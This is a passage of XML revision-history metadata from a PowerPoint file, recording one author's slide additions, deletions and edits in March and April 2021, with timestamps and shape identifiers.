        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T01:16:01.968" v="20" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4192303" sldId="311"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T01:15:59.634" v="12" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="591621681" sldId="312"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T01:15:59.941" v="13" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="214490323" sldId="313"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T01:16:00.176" v="14" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3337387503" sldId="318"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T01:16:00.511" v="15" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2446382234" sldId="319"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T01:16:02.572" v="22" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3877897741" sldId="320"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T01:16:02.772" v="23" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="926804527" sldId="321"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T01:16:10.808" v="26" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3506800452" sldId="322"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:11:17.157" v="45"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3192494774" sldId="330"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:08:54.186" v="34" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3192494774" sldId="330"/>
            <ac:spMk id="2" creationId="{AC8A2AAE-B936-47A0-A415-84BC7B4B21D5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:09:10.749" v="39" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3192494774" sldId="330"/>
            <ac:spMk id="3" creationId="{4929837B-3CC1-4F40-BFDA-890D8F6D680B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:10:21.179" v="42" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3192494774" sldId="330"/>
            <ac:picMk id="5" creationId="{267DA920-D0F2-47B7-AFD4-CAE821D9847B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:07:54.310" v="28" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3204093995" sldId="330"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:23:18.494" v="68"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2786836983" sldId="331"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:11:29.960" v="46" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2786836983" sldId="331"/>
            <ac:spMk id="2" creationId="{DDF12DEC-EBF8-435B-8A51-33BCA54A1D7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:11:29.960" v="46" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2786836983" sldId="331"/>
            <ac:spMk id="3" creationId="{249FFDE6-B4DA-4000-8FA7-FDF91E4128C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:11:40.570" v="48"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2786836983" sldId="331"/>
            <ac:spMk id="4" creationId="{E2DA0318-7086-4C48-B826-859F0A8A2849}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:12:01.937" v="51" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2786836983" sldId="331"/>
            <ac:spMk id="5" creationId="{238B2818-0C2A-4945-8FA7-025F23B99D45}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:12:25.879" v="57" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2786836983" sldId="331"/>
            <ac:spMk id="7" creationId="{D2EC9C14-40A0-47ED-866E-3120E1FFB527}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:22:30.844" v="66" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2786836983" sldId="331"/>
            <ac:spMk id="9" creationId="{0FAC32FE-7A05-44A4-BE9F-03BCE7E7029A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:39:53.920" v="76" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4264100167" sldId="332"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:24:59.767" v="75" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3230497500" sldId="333"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4DC338DC-19C7-41EB-B9B2-C1FF8A2AEED8}" dt="2021-03-06T15:24:59.767" v="75" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3230497500" sldId="333"/>
            <ac:spMk id="2" creationId="{9E88BBDB-151B-473C-98C4-05BAB679CCAC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:37:52.305" v="409" actId="47"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:35:25.685" v="11" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1323245308" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:35:22.040" v="10" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1323245308" sldId="256"/>
            <ac:spMk id="2" creationId="{B476BAF9-88AC-4600-B511-347782B9C875}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:35:25.685" v="11" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1323245308" sldId="256"/>
            <ac:spMk id="3" creationId="{58CD3106-2EE0-40F4-8C0B-042135FF9FB4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:35:13.934" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1681695341" sldId="257"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:36:21.520" v="30" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="239878079" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:35:55.688" v="12" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="239878079" sldId="258"/>
            <ac:spMk id="2" creationId="{1458A9C7-8A2A-4B00-A387-87F0EEFF4BED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:35:55.688" v="12" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="239878079" sldId="258"/>
            <ac:spMk id="3" creationId="{476D0410-DCF9-4DDE-9BC4-717985E262B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:36:21.520" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="239878079" sldId="258"/>
            <ac:spMk id="4" creationId="{35030484-B478-4AAC-A5BF-49C4C76CCF1C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:35:55.688" v="12" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="239878079" sldId="258"/>
            <ac:spMk id="5" creationId="{8D61F570-1AB5-41D7-8F9C-97089266BA95}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:27:39.492" v="379" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3825957635" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:36:30.166" v="32" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3825957635" sldId="259"/>
            <ac:spMk id="2" creationId="{66A64266-28F1-4EDD-9235-355FC2358CC0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:36:30.166" v="32" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3825957635" sldId="259"/>
            <ac:spMk id="3" creationId="{3C72794C-E8AC-411E-87ED-DB3C1F125575}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:37:06.056" v="67" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3825957635" sldId="259"/>
            <ac:spMk id="4" creationId="{C086CA5D-EAA4-4F5C-8056-2D0B1FAD4BE2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:51:48.291" v="370" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3825957635" sldId="259"/>
            <ac:spMk id="5" creationId="{1D98FE3A-3C68-4401-878C-EF963CF782F0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:27:39.492" v="379" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3825957635" sldId="259"/>
            <ac:picMk id="6" creationId="{C23D5C2C-DD7C-439C-B598-FD4D25EE23FA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:50:05.919" v="284" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3825957635" sldId="259"/>
            <ac:picMk id="7" creationId="{1ADE299D-D7C3-420A-8680-B50BE646AD21}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod ord modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:37:52.305" v="409" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1407049864" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:49:58.349" v="280" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1407049864" sldId="260"/>
            <ac:spMk id="2" creationId="{D5B12E70-4233-4EC2-AEFA-C12EFDCBB03C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:49:58.349" v="280" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1407049864" sldId="260"/>
            <ac:spMk id="3" creationId="{ABBF6D72-9D86-4B0F-9D45-A0E89C03DB3C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:29:10.242" v="381" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1407049864" sldId="260"/>
            <ac:picMk id="3" creationId="{237377D7-C1EF-4538-B968-4D5CB68F9CE4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:27:48.311" v="380" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1407049864" sldId="260"/>
            <ac:picMk id="4" creationId="{4B19DEE1-DADD-4338-915C-4B4C4903759B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:47:47.741" v="208" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3968540280" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:41:24.426" v="200" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3968540280" sldId="260"/>
            <ac:spMk id="2" creationId="{FA40CE92-38D5-4677-9CA1-71DC7C9C1BCB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:41:24.426" v="200" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3968540280" sldId="260"/>
            <ac:spMk id="3" creationId="{D9C866E5-B635-443E-819A-E57B79C94EB9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:41:24.426" v="200" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3968540280" sldId="260"/>
            <ac:spMk id="4" creationId="{8F4CE6B2-4B2A-4E3A-AD4A-BE87B8565811}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:43:03.178" v="201" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3968540280" sldId="260"/>
            <ac:picMk id="6" creationId="{D21EB996-B451-437A-ACF1-D5F6074111D9}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:47:49.228" v="209" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="358832557" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:43:22.175" v="203" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="358832557" sldId="261"/>
            <ac:spMk id="2" creationId="{B0B90FF8-CADE-4932-9592-E322DF15DB8E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:43:59.920" v="205" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="358832557" sldId="261"/>
            <ac:picMk id="4" creationId="{FD455B60-54F6-4F25-A102-885B38E9DB30}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:33:13.890" v="391" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2106921854" sldId="261"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:33:13.890" v="391" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2106921854" sldId="261"/>
            <ac:picMk id="3" creationId="{7219D80A-1792-4B2D-AA0B-CFBF75ED0E74}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:33:05.485" v="389" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2106921854" sldId="261"/>
            <ac:picMk id="5" creationId="{56F17925-F218-4942-85A1-7D281E4776B1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new add del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:49:40.213" v="276" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="347420429" sldId="262"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-05T18:45:49.816" v="207" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="347420429" sldId="262"/>
            <ac:picMk id="3" creationId="{4B13EFC7-F23B-44E3-B67C-98C4EE0E4E2C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:36:32.574" v="407" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4165750362" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:36:30.085" v="406" actId="11529"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4165750362" sldId="262"/>
            <ac:spMk id="6" creationId="{2D680713-8754-4A7A-9028-829FE8829DF5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:36:32.574" v="407" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4165750362" sldId="262"/>
            <ac:picMk id="3" creationId="{889A7C7A-B11F-4B57-9EC5-D17CAED9487D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5A07F049-72D9-4720-B4EC-BB8D110D853F}" dt="2021-04-08T12:36:16.621" v="404" actId="1440"/>
          <ac:picMkLst>
